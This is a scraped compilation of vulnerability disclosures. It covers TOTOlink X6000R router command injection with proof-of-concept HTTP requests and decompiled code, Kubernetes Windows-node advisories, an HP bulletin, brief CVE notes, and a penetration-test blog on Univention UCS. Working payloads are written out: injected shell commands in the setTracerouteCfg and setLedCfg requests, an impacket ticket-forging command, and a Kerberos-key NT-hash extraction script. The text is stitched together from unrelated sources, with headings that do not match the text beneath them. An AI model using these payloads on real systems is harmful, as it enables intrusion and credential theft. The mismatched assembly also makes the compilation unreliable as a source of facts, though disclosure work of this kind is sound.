A security issue was discovered in Kubernetes where a user that can create pods on Windows nodes may be able to escalate to admin privileges on those nodes. Kubernetes clusters are only affected if they include Windows nodes.


Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2023-3955

**Kubernetes privilege escalation vulnerability**

High severity GitHub Reviewed Published Oct 31, 2023 to the GitHub Advisory Database • Updated Nov 1, 2023

**Package**

gomod k8s.io/kubernetes (Go)

**Affected versions**

\= 1.28.0

\>= 1.27.0, < 1.27.5

\>= 1.26.0, < 1.26.8

\>= 1.25.0, < 1.25.13

< 1.24.17

**Patched versions**

1.28.1

1.27.5

1.26.8

1.25.13

1.24.17

**Description**

Published to the GitHub Advisory Database

Oct 31, 2023

GHSA-q78c-gwqw-jcmc: Kubernetes privilege escalation vulnerability

An issue in TOTOlink X6000R V9.4.0cu.852_B20230719 allows a remote attacker to execute arbitrary code via the setTracerouteCfg function of the stecgi.cgi component.

**TOTOlink X6000R V9.4.0cu.852\_B20230719 command injection****Produce information**

Device：TOTOlink X6000R  
Firmware version：V9.4.0cu.852\_B20230719  
Manufacturer’s website information：https://www.totolink.net/  
The firmware download address：https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/247/ids/36.html

**Vulnerability description**

Arbitrary command execution exists on the setTracerouteCfg interface of cstecgi .cgi

**poc**

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  

    POST /cgi-bin/cstecgi.cgi HTTP/1.1Host: 172.28.60.132Content-Length: 76Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://172.28.60.132Referer: http://172.28.60.132/advance/diagnosis.html?time=1694021202884Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close{"command":"127.0.0.1|ls>/web/test2.txt|","num":"1","topicurl":"setTracerouteCfg"}

Inject the command “ls>/web/tes2t.txt”

Injection result:

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  

    GET /test3.txt HTTP/1.1Host: 172.28.60.132Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

**Analyse**

The function in the shttp

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  
16  
17  

    __int64 __fastcall sub_415950(__int64 a1, __int64 a2){  const char *v4; // x22  const char *v5; // x0  unsigned int v6; // w0  char s[256]; // [xsp+38h] [xbp+38h] BYREF  memset(s, 0, sizeof(s));  v4 = (const char *)sub_40BD6C(a1, "command");  v5 = (const char *)sub_40BD6C(a1, "num");  v6 = atoi(v5);  if ( (unsigned int)(snprintf(s, 0x100uLL, "traceroute -m %d %s&>/var/log/traceRouteLog", v6, v4) + 1) > 0x100 )    __break(0x3E8u);  CsteSystem(s, 0LL);  sub_40BDA0(a2, 1LL, "", 0LL, "0", "reserv");  return 0LL;}

There is a command splicing that bypasses execution without any filtering!

CVE-2023-46485: TOTOlink X6000R command injection(setTracerouteCfg)

An issue in TOTOlink X6000R V9.4.0cu.852_B20230719 allows a remote attacker to execute arbitrary code via the setLedCfg function.

**TOTOlink X6000R command injection****Product Information**

Device: TOTOlink X6000R  
Firmware version: V9.4.0cu.852\_B20230719  
Manufacturer’s website information：https://www.totolink.net/  
The firmware download address：https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/247/ids/36.html

**Vulnerability description**

There is arbitrary command execution on the setLedCfg interface of cstecgi .cgi

**poc**

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  

    POST /cgi-bin/cstecgi.cgi HTTP/1.1Host: 172.28.60.132Content-Length: 55Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://172.28.60.132Referer: http://172.28.60.132/basic/qos.html?time=1694023460381Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close{"enable":"`ls>/web/test5.txt`","topicurl":"setLedCfg"}

Inject commands： “ls>/web/test5.txt”

Test results.

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  

    GET /test5.txt HTTP/1.1Host: 172.28.60.132Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

**Analysis**

The following functions in shttp

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  
16  
17  

    __int64 __fastcall sub_411F90(__int64 a1, __int64 a2){  const char *v3; // x20  unsigned int v4; // w19  v3 = (const char *)sub_40BD6C(a1, "enable");  v4 = atoi(v3);  if ( *v3 && v4 <= 1 )  {    Uci_Set_Str(11LL, "main", "led_status", v3);    Uci_Commit(11LL);    set_led_status(v4);  }  datconf_set_by_key("/var/cste/temp_status", "mesh_update", "1");  sub_40BDA0(a2, 1LL, "", 0LL, "0", "reserv");  return 0LL;}

There is an enable variable command splicing to bypass the execution, without any filtering!

The root cause comes from the following

Since the Uci\_Set\_Str function command arguments of the libcscommon.so library in shttpd are susceptible to operating system command injection. When the program calls get\_uci2json, it will call Uci\_Set\_Str in the so library, causing arbitrary command execution, and the permissionless operation of the interface setLanguageCfg leads to unauthorized arbitrary command execution.

In this part of shttpd, the relevant language settings are called

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  
16  
17  
18  
19  
20  
21  
22  
23  
24  
25  
26  
27  
28  
29  
30  
31  
32  
33  
34  
35  
36  
37  
38  
39  
40  
41  
42  
43  
44  
45  
46  
47  
48  
49  
50  
51  
52  
53  
54  
55  

    __int64 __fastcall sub_4117F8(__int64 a1, __int64 a2){  const char *v4; // x22  const char *v5; // x23  int v6; // w0  int v8; // [xsp+44h] [xbp+44h] BYREF  char s[8]; // [xsp+48h] [xbp+48h] BYREF  __int64 v10; // [xsp+50h] [xbp+50h]  __int64 v11; // [xsp+58h] [xbp+58h]  __int64 v12; // [xsp+60h] [xbp+60h]  __int64 v13; // [xsp+68h] [xbp+68h]  __int64 v14; // [xsp+70h] [xbp+70h]  __int64 v15; // [xsp+78h] [xbp+78h]  __int64 v16; // [xsp+80h] [xbp+80h]  __int64 v17[8]; // [xsp+88h] [xbp+88h] BYREF  v4 = (const char *)sub_40BD6C(a1, "lang");  v5 = (const char *)sub_40BD6C(a1, "langAutoFlag");  v8 = 0;  *(_QWORD *)s = 0LL;  v10 = 0LL;  v11 = 0LL;  v12 = 0LL;  v13 = 0LL;  v14 = 0LL;  v15 = 0LL;  v16 = 0LL;  memset(v17, 0, sizeof(v17));  Uci_Set_Str();  Uci_Get_Int(11LL, "main", "lang_auto_flag", &v8);  v6 = atoi(v5);  if ( v6 != v8 )    Uci_Set_Str();  Uci_Commit(11LL);  snprintf(s, 0x40uLL, "helpurl_%s", v4);  Uci_Get_Str(15LL, "custom", s, v17);  if ( LOBYTE(v17[0]) )  {    *(_QWORD *)s = 0LL;    v10 = 0LL;    v11 = 0LL;    v12 = 0LL;    v13 = 0LL;    v14 = 0LL;    v15 = 0LL;    v16 = 0LL;    snprintf(s, 0x40uLL, "http://%s", (const char *)v17);  }  else  {    strcpy(s, "");  }  sub_40BDA0(a2, 1LL, "", 0LL, "0", s);  return 0LL;}

现在来看libcscommon.so

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  

    ABEL_57:  while ( 1 )  {    off_2AB30(v12, 1024LL, "uci -c %s set %s.%s.%s=\"%s\"", v9, v10, a2, a3, a4);    off_2AD78(v12, 0LL);    result = 1LL;LABEL_58:    if ( v13 == *(_QWORD *)off_2A970 )      break;    off_2AC18();LABEL_60:    v9 = "/tmp/cste/";    v10 = "system_status";  }  return result;

The off\_2AD78 of them is LOAD:000000000002AD78 18 60 00 00 00 00 00 00 off\_2AD78 DCQ CsteSystem

That is, system

CVE-2023-46484: TOTOlink X6000R command injetction (setLedCfg)

A security issue was discovered in Kubernetes where a user
 that can create pods on Windows nodes may be able to escalate to admin 
privileges on those nodes. Kubernetes clusters are only affected if they
 include Windows nodes.


**Rita Zhang**

unread,

Aug 23, 2023, 5:27:37 PMAug 23

to kubernetes-announce, dev, kubernetes-sec...@googlegroups.com, kubernetes-security-discuss, distributo...@kubernetes.io

Hello Kubernetes Community,

A security issue was discovered in Kubernetes where a user that can create pods on Windows nodes may be able to escalate to admin privileges on those nodes. Kubernetes clusters are only affected if they include Windows nodes.

This issue has been rated \*\***HIGH**\*\* (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H \- 8.8), and assigned \*\*CVE-2023-3676\*\*

**Am I vulnerable?**

Any kubernetes environment with Windows nodes is impacted.  Run \`kubectl get nodes -l kubernetes.io/os=windows\` to see if any Windows nodes are in use.

**Affected Versions**

\- kubelet <= v1.28.0

\- kubelet <= v1.27.4

\- kubelet <= v1.26.7

\- kubelet <= v1.25.12

\- kubelet <= v1.24.16

**How do I mitigate this vulnerability?**

The provided patch fully mitigates the vulnerability and has no known side effects.  Full mitigation for this class of issues requires patches applied for CVE-2023-3676, CVE-2023-3955, and CVE-2023-3893.

Outside of applying the provided patch, there are no known mitigations to this vulnerability.

**Fixed Versions**

\- kubelet v1.28.1

\- kubelet v1.27.5

\- kubelet v1.26.8

\- kubelet v1.25.13

\- kubelet v1.24.17

These releases will be published over the course of today, August 23rd, 2023.

To upgrade, refer to the documentation:

https://kubernetes.io/docs/tasks/administer-cluster/cluster-management/#upgrading-a-cluster

**Detection**

Kubernetes audit logs can be used to detect if this vulnerability is being exploited. Pod create events with embedded powershell commands are a strong indication of exploitation. Config maps and secrets that contain embedded powershell commands and are mounted into pods are also a strong indication of exploitation.

If you find evidence that this vulnerability has been exploited, please contact secu...@kubernetes.io

**Additional Details**

See the GitHub issue for more details: https://github.com/kubernetes/kubernetes/issues/119339

**Acknowledgements**

This vulnerability was reported by Tomer Peled @tomerpeled92

The issue was fixed and coordinated by the fix team: 

James Sturtevant @jsturtevant

Mark Rossetti @marosset

Andy Zhang @andyzhangx

Justin Terry @jterry75

Kulwant Singh @KlwntSingh

Micah Hausler @micahhausler

Rita Zhang @ritazh

and release managers:

Jeremy Rickard @jeremyrickard

Thank You,

Rita Zhang on behalf of the Kubernetes Security Response Committee

CVE-2023-3676: [Security Advisory] CVE-2023-3676: Insufficient input sanitization on Windows nodes leads to privilege escalation

CVSS Rating: CVSS:3.1/av:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - **HIGH** (8.8)

A security issue was discovered in Kubernetes where a user that can create pods on Windows nodes may be able to escalate to admin privileges on those nodes. Kubernetes clusters are only affected if they include Windows nodes.

**Am I vulnerable?**

Any kubernetes environment with Windows nodes is impacted. Run kubectl get nodes -l kubernetes.io/os=windows to see if any Windows nodes are in use.

**Affected Versions**

*   kubelet <= v1.28.0
*   kubelet <= v1.27.4
*   kubelet <= v1.26.7
*   kubelet <= v1.25.12
*   kubelet <= v1.24.16

**How do I mitigate this vulnerability?**

The provided patch fully mitigates the vulnerability (see fix impact below). Full mitigation for this class of issues requires patches applied for CVE-2023-3676, CVE-2023-3955, and CVE-2023-3893.

Outside of applying the provided patch, there are no known mitigations to this vulnerability.

**Fixed Versions**

*   kubelet master - fixed by Use environment variables for parameters in Powershell #120128
*   kubelet v1.28.1 - fixed by Cherry pick of #120128 Use environment variables for parameters in Powershell #120134
*   kubelet v1.27.5 - fixed by Cherry pick of #120128 Use environment variables for parameters in Powershell #120135
*   kubelet v1.26.8 - fixed by Cherry pick of #120128 Use environment variables for parameters in Powershell #120136
*   kubelet v1.25.13 - fixed by Cherry pick of #120128 Use environment variables for parameters in Powershell #120137
*   kubelet v1.24.17 - fixed by Cherry pick of #120128 Use environment variables for parameters in Powershell #120138

**Fix impact:** Passing Windows Powershell disk format options to in-tree volume plugins will result in an error during volume provisioning on the node. There are no known use cases for this functionality, nor is this functionality supported by any known out-of-tree CSI driver.

To upgrade, refer to the documentation:  
https://kubernetes.io/docs/tasks/administer-cluster/cluster-upgrade/

**Detection**

Kubernetes audit logs can be used to detect if this vulnerability is being exploited. Pod create events with embedded powershell commands are a strong indication of exploitation.

If you find evidence that this vulnerability has been exploited, please contact security@kubernetes.io

**Acknowledgements**

This vulnerability was discovered by James Sturtevant @jsturtevant and Mark Rossetti @marosset during the process of fixing CVE-2023-3676 (that original CVE was reported by Tomer Peled @tomerpeled92)

The issue was fixed and coordinated by the fix team:

James Sturtevant @jsturtevant  
Mark Rossetti @marosset  
Andy Zhang @andyzhangx  
Justin Terry @jterry75  
Kulwant Singh @KlwntSingh  
Micah Hausler @micahhausler  
Rita Zhang @ritazh

and release managers:

Jeremy Rickard @jeremyrickard

CVE-2023-3955: CVE-2023-3955: Insufficient input sanitization on Windows nodes leads to privilege escalation · Issue #119595 · kubernetes/kubernetes

Certain versions of HP PC Hardware Diagnostics Windows are potentially vulnerable to elevation of privilege.

Certain versions of HP PC Hardware Diagnostics Windows, HP Image Assistant, and HP Thunderbolt Dock G2 Firmware are potentially vulnerable to buffer overflow and/or elevation of privilege.

Severity

High

HP Reference

HSPBHF03848 Rev. 2

Release date

May 11, 2023

Last updated

October 30, 2023

Category

PC

Potential Security Impact

Potential Buffer Overflow, Elevation of Privilege

**Relevant Common Vulnerabilities and Exposures (CVE) List**

Reported by: Phuongdd from VinCSS (PSR-2022-0163), Michael Alfaro (alfarom256) Security Engineer at Nephosec (PSR-2022-0209), Solomon Ucko (PSR-2023-0031), Defensive Research of Bank of America (PSR-2023-0114).

List of CVE IDs    

CVE ID

CVSS

Severity

Vector

CVE-2023-32673

7.8

High

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2023-32674

5.5

Medium

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2023-5739

7.8

High

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Learn more about CVSS 3.1 base metrics, which range from 0 to 10.

PSR-2022-0163, PSR-2022-0209, PSR-2023-0031, PSR-2023-0114

**Resolution**

HP has released updates to mitigate the potential vulnerabilities. HP has identified affected platforms and corresponding SoftPaqs with minimum versions that mitigate the potential vulnerabilities. See the affected platforms listed below.

Newer versions might become available and the minimum versions listed below might become obsolete.  If a SoftPaq Link becomes invalid, check the HP Customer Support - Software and Driver Downloads site to obtain the latest update for your product model.

HP recommends keeping your system up to date with the latest firmware and software.

Note:

This bulletin might be updated when new information and/or SoftPaqs are available. Sign up for HP Subscriptions to be notified and receive:

*   Product support eAlerts
    
*   Driver updates
    
*   Security Bulletin updates
    

**SoftPaqs and affected products**

Find the SoftPaqs that resolve the vulnerabilities of your system.

*   HP PC Hardware Diagnostics Windows:
    
    *   Download and install SP149728.exe (version 2.4.0.0 or newer): https://ftp.hp.com/pub/softpaq/sp149501-150000/sp149728.exe
        
    
*   HP Image Assistant:
    
    *   Download and install SP145698.exe (version 5.1.8 or newer): https://ftp.ext.hp.com/pub/caps-softpaq/cmit/HPIA.html
        
    
*   HP Thunderbolt Dock G2 – Firmware:
    
    *   Download and install SP143977.exe: https://h30439.www3.hp.com/pub/softpaq/sp143501-144000/sp143977.exe
        
    

**Revision history**

This document has been revised according to the information below.

List of versions   

Version

Description

Date

2

Updated attribution, HP PC Hardware Diagnostics SoftPaq version and added CVE-2023-5739

October 30, 2023

1

Initial Release

May 11, 2023

**Additional information**

Follow these links for additional information.

Third-party security patches

Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support

For issues about implementing the recommendations of this Security Bulletin, visit http://www.hp.com/go/contacthp to learn about your HP support options.

Report

To report a potential security vulnerability with any HP supported product, send email to: hp-security-alert@hp.com.

Subscribe

To initiate a subscription to receive future HP Security Bulletin alerts via email, visit https://h41369.www4.hp.com/alerts-signup.php?lang=en&cc=US&jumpid=hpsc\_profile.

Security bulletin archive

To view released Security Bulletins, visit https://support.hp.com/security-bulletins.

It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.

Download HP’s security-alert PGP key

**Legal information**

System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.

HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Security Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Security Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement.

© Copyright 2023 HP Development Company, L.P.

HP Inc. (HP) shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP nor its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. "HP Inc.," "HP" and the names of HP products referenced herein are trademarks of HP Inc. or its affiliates in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.

CVE-2023-5739: HP PC Hardware Diagnostics Windows, HP Image Assistant, and HP Thunderbolt Dock G2 Firmware – Potential Buffer Overflow, Elevation of Privilege

The C:\Windows\Temp\Agent.Package.Availability\Agent.Package.Availability.exe file is automatically launched as SYSTEM when the system reboots. Since the C:\Windows\Temp\Agent.Package.Availability folder inherits permissions from C:\Windows\Temp and Agent.Package.Availability.exe is susceptible to DLL hijacking, standard users can write a malicious DLL to it and elevate their privileges.


*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-37243: Vulnerability-Disclosures/2023/MNDT-2023-0010.md at master · mandiant/Vulnerability-Disclosures

Archive, check and export commands in Chef InSpec
prior to 4.56.58 and 5.22.29 allow local command execution via maliciously
crafted profile.





CVE-2023-42658: InSpec CLI

An issue in Univention UCS v.5.0 allows a local attacker to execute arbitrary code and gain privileges via the check_univention_joinstatus function.

**Table of Contents**

1.  Introduction
2.  The Basics
3.  Exploitation via LDAP
4.  Exploitation via SSH/Kerberos
5.  Exploitation via Hash Cracking
6.  The Fix
7.  Lessons Learned
8.  Disclosure Timeline
9.  Update history

**Introduction**

Recently, DriveByte was assigned to perform a penetration test for a customer. The goal was to find as many vulnerabilities as possible, as well as to determine, if an attacker would be able to compromise the customer’s infrastructure. The unusual part about it? The customer’s IT had no Microsoft Active Directory nor Entra ID but something similar. It was based on a product called Univention UCS, which is according to their website, a solution for "easy and centralized administration of domains". This was especially interesting for us, as we did not know this solution before and are of course always genuinely interested in digging into new technologies. The following blogpost shows a very classic and simple flaw, that had a huge impact on the customer's environment.

Since the initial publication of this blogpost, some changes have been made. This includes especially some additional information that we received from univention. For better tracking we added a section "Update History". Special thanks again to Univention for the awesome information and collaboration!

**TLDR:**

By spying on the process creation of a UCS connected server with extensive permissions, it was possible to gather a large amount of LDAP data. This data includes different credentials and other authentication information. The vendor responded extremely professional and fixed the issues very quickly. He did not only fix the script where we found the issue, but also checked their code base for similar problems and fixed them as well.

**Do the basics. They might reward you with some quick wins!**

The vulnerability analysis was performed with access to the customer’s network and a user with very limited permissions (domain joined, but nothing else). While enumerating the network, we found that it is possible to access several servers with our basic user via SSH (remember, the network is mainly based on Linux machines, with only a very small number of Windows and Mac machines). This was possible due to faulty configured permissions and is not a default setting or problem of Univention UCS, but a configuration error. We know this kind of misconfigurations from Windows Active Directory environments, where we often see permissions for "authenticated users" for SMB, RDP and so on.

Of course, this was a very easy entry point and we started to dig into the machines to see if there is anything juicy to be found. Before trying to escalate privileges, we first checked for secrets and so on. Also, for chances of a quick win, we usually start monitoring process creations, to check for privilege escalation opportunities and other valuable information (hell yeah, full HackTheBox/OSCP style!!!). By searching through the system, we discovered the files /etc/ldap.secret and /etc/machine.secret. This sounded like relevant information. Sadly, we couldn’t read the files, as they were set to read/write-only by root. Also, we didn't know what they are used for, but suspected them to be part of the Univention software. A quick search through the extensive Univention documentation proved this assumption right. After publishing this blogpost, Univention contacted us again and hinted us to this discussion about a solution for the machine.secret and ldap.secretfiles. As they identified this files as a possible attack surface, they are planning to find another solution for this. So a solution is in the making.

We played around a little with some of the Univention scripts etc., but at first did not find anything that seemed promising. So, the next step was to check for privilege escalation. Next to other approaches, we went back to the process creation monitoring, and there it was:

The script check_univention_joinstatus requested the LDAP database as the system account, presenting the password in cleartext. We suspected that this might be the password from the /etc/machine.secret file which was later confirmed. So, the logical next step for us was to recreate this exact command from our attacker machine. We were quite surprised to see, that this machine had permissions to basically perform DCSync. It's not Windows AD of course. The machine had the permission to retrieve ALL directory objects _with all their attributes_. This includes users, with their krb5key, sambaNTPassword (NTHash), SHA512 or bcrypt hashes (SHA512 is the default) as well as their password history. The following screenshot shows the output we recreated in a lab environment:

However, this is only possible if the domain joined system has the permissions that match DCSync. In our test environment we joined an arbitrary machine to the domain and checked what information we get back from the "Domain Controller". So, in comparison to the information above, you can see in the screenshot below what information a usual domain joined system gets:

**Exploitation attempt 1: LDAP**

To exploit this issue, we can rely on n00py's awesome "Alternative ways to Pass the Hash (PtH)" blogpost. However, a bit more research on that topic showed, that it is not as simple as we first thought. Our first guess was, that we can just use the LDAP3 Python module to connect to LDAP with the NTLM hash. Unfortunately, that seems to be impossible with Univention, as it is not supporting NTLM authentication for LDAP:

While our first impression was, that we are doing something wrong, this GitHub entry stated that the "authMethodNotSupported" message is from the server. It seems that Univention does not have NTLM authentication activated on the server by default (atm, we don't know if it is supported at all).

For comparison, the SIMPLE authentication via LDAP is working fine:

But the 'server.info' output is puzzling us a bit because it says that NTLM is a valid SASL mechanism, so maybe there is a workaround by using NTLM for SASL. Before going too deep into that path and losing a lot of time, we decided to try something else. Maybe this motivates somebody who has more knowledge in this area to dig into it. Or maybe we will come back to this later...

Here we also got some additional information from Univention. NTLM is indeed not supported. The fact that it is still shown as supported sasl mechanism is due to the OpenLDAP defaulf configuration. Univention is tracking this issue here.

**Exploitation attempt 2: SSH via Kerberos**

As an alternative way, \\@n00py suggests in his blogpost to use the NThash to sign a Kerberos ticket and then connect via SSH. Well, that seems easy. So we took the administrator's hash and threw it in Impacket's ticketer.py. All information for this including the domain-sid etc. was included in the full domain dump.

    ticketer.py -nthash 3B0E04870F352EDC0EF120F16431FA42 -domain-sid S-1-5-21-2228799870-4051273110-1256914315 -spn host/ucs-7427.drivebytetest.intranet -domain drivebytetest.intranet Administrator

Sadly, the authentication failed with the following message:

As this is no traditional AD, we were thinking that they could use another approach to sign their Kerberos tickets. What was bugging us from the start was the krb5Key fields we've seen in the second screenshot. And again, the Univention documentation comes to our rescue. It states that "The krb5Key attribute stores the Kerberos password". Nice. But how?

After googling for a while, we came across this post in the Univention help forum. It contains some very interesting information. First, the krb5Key seems to consist of a keytype, a keyblock, in one case even an NThash and a salt string. Well, now of course we wanted to get our fingers on this s4search-decode script that was mentioned in this help request. We did not find it. It wasn’t on the domain controller and we didn't find it in the Univention Git repo (but maybe we just went over it???, there are tons of mentions, but we didn't find the actual script <- The awesome people from univention pointed us to this. So yeah. We were indeed just not finding it somehow). At that point a friend with whom we discussed the topic pointed us to the following page https://docs.software-univention.de/ucs-python-api/\_modules/univention/s4connector/s4/password.html. This file can also be found in the Univention Git. He pointed this out to us because of the following function:

    ...
    def extract_NThash_from_krb5key(ucs_krb5key):
    
        NThash = None
    
        for k in ucs_krb5key:
            (keyblock, salt, kvno) = heimdal.asn1_decode_key(k)
    
            enctype = keyblock.keytype()
            enctype_id = enctype.toint()
            if enctype_id == 23:
                krb5_arcfour_hmac_md5 = keyblock.keyvalue()
                NThash = binascii.b2a_hex(krb5_arcfour_hmac_md5)
                break
    
        return NThash
    
    ...

Nice. This seemed promising with only one downside; The dependency on heimdal which looked like a Univention-specific library version. We quickly recognized that this lib is installed on the Univention DC. But we didn't want to rely on that for executing the script. After a bit of searching we found a download portal which offered a Debian package and the source code etc. The package requires python below 3.8 and some other dependencies, but nothing too special. So we spun up a docker container to go on with the testing (The Dockerfile and final script can be found on our GitHub). We extracted the function, added only the important imports, and fired it up in iPython... and failed:

It seems that the krb5Key usually is not base64 encoded when passed to the function. But after modifying this, we were still running into an error. We started to break down the steps and came out with the following working script, which does basically the same steps as the actual function.

    #!/usr/bin/python3
    # -*- coding: utf-8 -*-
    
    import binascii
    import heimdal
    import base64
    import argparse
    
    krb5_keytype__des_cbc_crc = 1
    krb5_keytype__des_cbc_md4 = 2
    krb5_keytype__des_cbc_md5 = 3
    krb5_keytype__des3_cbc_sha1 = 16
    krb5_keytype__aes128_cts_hmac_sha1_96 = 17
    krb5_keytype__aes256_cts_hmac_sha1_96 = 18
    krb5_keytype__arcfour_hmac_md5 = 23
    
    def extract_NThash_from_krb5key(ucs_krb5key):
    
        NThash = None
    
        keyblock,salt,kvno = heimdal.asn1_decode_key(base64.b64decode(ucs_krb5key))
    
        if keyblock.keytype().toint() == krb5_keytype__arcfour_hmac_md5:
            NThash = binascii.hexlify(keyblock.keyvalue()).decode('utf-8')
        else:
            print(f'Keytype is: ', keyblock.keytype().toint())
    
        return NThash
    
    
    def main():
        parser = argparse.ArgumentParser(
                prog='ProgramName',
                        description='Simple tool to extract ntlm hash out of the arcfour_hmac_md5 krb5key used by univention ucs')
        parser.add_argument('-d', help="put your base64 encoded krb5key value here", required=True)
        args = parser.parse_args()
        nt_hash = extract_NThash_from_krb5key(args.d)
        print("NThash: ",nt_hash)
    
    
    if __name__ == '__main__':
        main()

And this worked like a charm. It allows us to extract the NThash out of the krb5Key. Now we could take the krb5Key of the krbtgt account for example to forge a ticket as Administrator, which is the default "Domain Admin" in Univention UCS.

And that's it. We can now be everybody we want to be :blush:.

Maybe we can also use the other keyblock values to sign the TGTs somehow. But we didn't look into that so far.

**Exploitation attempt 3: Hash Cracking**

As we are in possession of the NThashes, we are also able to try password cracking quite efficiently. We confirmed that the sambaNTPassword represents the actual password. Using hashcat, some proper wordlists as well as some good rules, can open some more pathways.

Using those methods we were able to go from "any user in the directory" to "Administrator", the "Domain Admin" equivalent because of some very basic misconfigurations, a trivial but impactful bug and a recoverable password.

**The Fix**

The mitigation time and responses from Univention have been extraordinary. It was a pleasure to work with them, as the communication was fast, professional as well as solution-oriented! Special thanks for this awesome experience and awareness for security! Univention rated the bug with 7.9 (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N)

CVE-2023-38994 was reserved by MITRE for this issue, but not released yet.

Fixed version: Univention UCS 5.0-4 Fix number: 1.0.2-4

**Lessons Learned**

*   Do not grant "everyone" or "authenticated users" permissions to any machine if possible (and we guess that’s possible in almost every scenario)
*   Upgrade your software
*   Set strong and unique passwords
*   For developers and admins: Avoid sensitive information in process creations (Univention added this to their developers security guidelines. Great Job!)

**Disclosure Timeline**

2023/07/17 - Bug Reported

2023/07/17 - Bug confirmed by Univention and opened in their Bugtracker

2023/07/17 - GitHub push to fix the Bug

2023/07/19 - Fix release in 1.0.2-4 Release Note

2023/07/19 - Fix release of similar issues in another script Release Note

**Update History**

*   2023/10/19 - Added advisory for developers and admins in Lesson Learned
*   2023/10/30 - Mentioning Updates in the introduction
*   2023/10/30 - Added information about the misconfiguration of the ssh permissions
*   2023/10/30 - Added the outlook on a solution for the machine.secret and ldap.secret files
*   2023/10/30 - Changed wording from "synced" to "requested"
*   2023/10/30 - Added additional information and bugtracker about NTLM
*   2023/10/30 - Added the link to the s4search-decode script
*   2023/10/30 - Updated "Lessons Learned" with the fact that univention updated their developers security guidelines
*   2023/10/30 - Added link to the bugtracker in the timeline

CVE-2023-38994: Simple yet effective. The story of some simple bugs that led to the complete compromise of a network

